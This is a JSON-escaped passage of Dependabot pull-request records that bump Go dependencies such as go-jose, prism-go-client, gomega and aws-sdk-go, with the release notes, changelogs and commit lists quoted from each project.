\u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Vedansh074\"\u003e\u003ccode\u003e@​Vedansh074\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/350\"\u003enutanix-cloud-native/prism-go-client#350\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d8d91a890f00890b90ee61560e7400c07a601e75\"\u003e\u003ccode\u003ed8d91a8\u003c/code\u003e\u003c/a\u003e feat: Implement DomainManager service with GetPrismCentralVersion (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/318\"\u003e#318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/037b98630f382132c9d896e721d01e61da3650c9\"\u003e\u003ccode\u003e037b986\u003c/code\u003e\u003c/a\u003e feat: Implement List and Get methods for Users service (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.3.4...v0.7.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.39.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/1a25a36414f51967615277623eed3b85b0ca6ce8\"\u003e\u003ccode\u003e1a25a36\u003c/code\u003e\u003c/a\u003e v1.39.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/406faee2de82aa2584ea4d76b0e2662f70ae4d2c\"\u003e\u003ccode\u003e406faee\u003c/code\u003e\u003c/a\u003e bump all deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49561ad293853e660030f8397b07607127e3ebb7\"\u003e\u003ccode\u003e49561ad\u003c/code\u003e\u003c/a\u003e v1.39.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/8f7f42585ccc794dcb3a4979ac7d67e00fb070ae\"\u003e\u003ccode\u003e8f7f425\u003c/code\u003e\u003c/a\u003e document MatchErrorStrictly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bae643da0469185d9502e8d7528da137f4c62320\"\u003e\u003ccode\u003ebae643d\u003c/code\u003e\u003c/a\u003e add matcher relecting errors.Is behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/a3ca2ca026268dc6acfc60a2e8393b33b428c507\"\u003e\u003ccode\u003ea3ca2ca\u003c/code\u003e\u003c/a\u003e v1.38.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/4dada364c7635fffe6b8a6b45a7588dabd64cdf4\"\u003e\u003ccode\u003e4dada36\u003c/code\u003e\u003c/a\u003e fix failing have http tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/d40c6917ce1a2c9299bda4b900b59d80bdefc689\"\u003e\u003ccode\u003ed40c691\u003c/code\u003e\u003c/a\u003e make string formatitng more consistent for users who use format.Object directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/2a37b463cac790e945d16f52c1c13a4e835511a1\"\u003e\u003ccode\u003e2a37b46\u003c/code\u003e\u003c/a\u003e doc: fix typos\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ee26170d3a0a21d5702f4164df42eb99c50221d7\"\u003e\u003ccode\u003eee26170\u003c/code\u003e\u003c/a\u003e docs: fix HaveValue example\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10744","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10744","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10744/packages"}},{"old_version":"1.45.15","new_version":"1.55.8","update_type":"minor","path":"the go-dependencies group","pr_created_at":"2026-04-12T03:01:24.000Z","version_change":"1.45.15 → 1.55.8","issue":{"uuid":"4246340042","node_id":"PR_kwDOGYRM8c7RuZhJ","number":6,"state":"closed","title":"Bump github.com/aws/aws-sdk-go from 1.45.15 to 1.55.8 in the go-dependencies group","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-12T07:11:25.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-12T03:01:24.000Z","updated_at":"2026-04-12T07:11:26.000Z","time_to_close":15001,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.45.15","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"the go-dependencies group","ecosystem":"go"},"body":"Bumps the go-dependencies group with 1 update: [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go).\n\nUpdates `github.com/aws/aws-sdk-go` from 1.45.15 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 